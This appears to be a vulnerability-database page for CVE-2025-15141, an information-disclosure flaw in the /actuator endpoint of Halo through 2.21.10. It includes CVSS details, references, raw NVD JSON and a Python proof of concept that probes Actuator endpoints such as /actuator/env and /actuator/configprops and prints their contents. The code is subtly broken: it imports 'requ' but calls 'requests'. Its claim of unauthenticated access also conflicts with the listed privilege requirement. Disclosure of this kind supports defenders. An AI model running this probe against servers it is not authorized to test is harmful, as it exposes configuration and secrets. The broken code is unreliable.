Security Vulnerability Report
CVE-2025-15141 CVSS 3.1 LOW

CVE-2025-15141

Published: 2025-12-28 15:15:42
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was determined in Halo up to 2.21.10. This issue affects some unknown processing of the file /actuator of the component Configuration Handler. Executing a manipulation can lead to information disclosure. The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:halo:halo:*:*:*:*:*:*:*:* - VULNERABLE
Halo <= 2.21.10 (versionEndIncluding: 2.21.10)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-15141 PoC - Halo Actuator Information Disclosure

This PoC demonstrates the information disclosure vulnerability in Halo's
/actuator endpoint.

Note: This code is for educational and authorized testing purposes only.
"""
import json
import sys

import requ

TARGET_HOST = "http://target-server.com"  # Replace with target URL

# Spring Boot Actuator endpoints probed for unauthenticated access.
ACTUATOR_ENDPOINTS = [
    "/actuator/env",
    "/actuator/configprops",
    "/actuator/beans",
    "/actuator/health",
    "/actuator/info",
]


def check_actuator_vulnerability(target):
    """
    Check if the target is vulnerable to Actuator information disclosure.

    Returns True if at least one actuator endpoint answered HTTP 200.
    """
    print(f"[*] Testing target: {target}")
    print("=" * 60)
    vulnerable = False

    for endpoint in ACTUATOR_ENDPOINTS:
        url = f"{target}{endpoint}"
        try:
            # verify=False skips TLS certificate validation (self-signed test setups);
            # requests will emit an InsecureRequestWarning for HTTPS targets.
            response = requests.get(url, timeout=10, verify=False)
            if response.status_code == 200:
                print(f"\n[!] Found accessible endpoint: {endpoint}")
                print(f"[!] Status Code: {response.status_code}")
                vulnerable = True
                try:
                    data = response.json()
                    print(f"[+] Response Preview:\n{json.dumps(data, indent=2)[:500]}...")
                except ValueError:
                    # Body was not JSON (requests' JSONDecodeError is a ValueError).
                    print(f"[+] Response (text): {response.text[:500]}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")

    print("\n" + "=" * 60)
    if vulnerable:
        print("[!] Target appears to be VULNERABLE to CVE-2025-15141")
        print("[!] Actuator endpoints are accessible without authentication")
    else:
        print("[-] Target does not appear to be vulnerable")
    return vulnerable


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_HOST = sys.argv[1]
    check_actuator_vulnerability(TARGET_HOST)
```

References

https://github.com/SECWG/cve/issues/9 (Issue Tracking)
https://vuldb.com/?ctiid.338519 (Permissions Required, VDB Entry)
https://vuldb.com/?id.338519 (Third Party Advisory, VDB Entry)
https://vuldb.com/?submit.715235 (Third Party Advisory, VDB Entry)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-15141", "sourceIdentifier": "[email protected]", "published": "2025-12-28T15:15:41.813", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Halo up to 2.21.10. This issue affects some unknown processing of the file /actuator of the component Configuration Handler. Executing a manipulation can lead to information disclosure. The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is assessed as difficult. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 2.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:halo:halo:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.21.10", "matchCriteriaId": "2A29BF3B-F0A5-4682-8FFB-46EA7168FBFF"}]}]}], "references": [{"url": "https://github.com/SECWG/cve/issues/9", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.338519", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338519", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.715235", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
```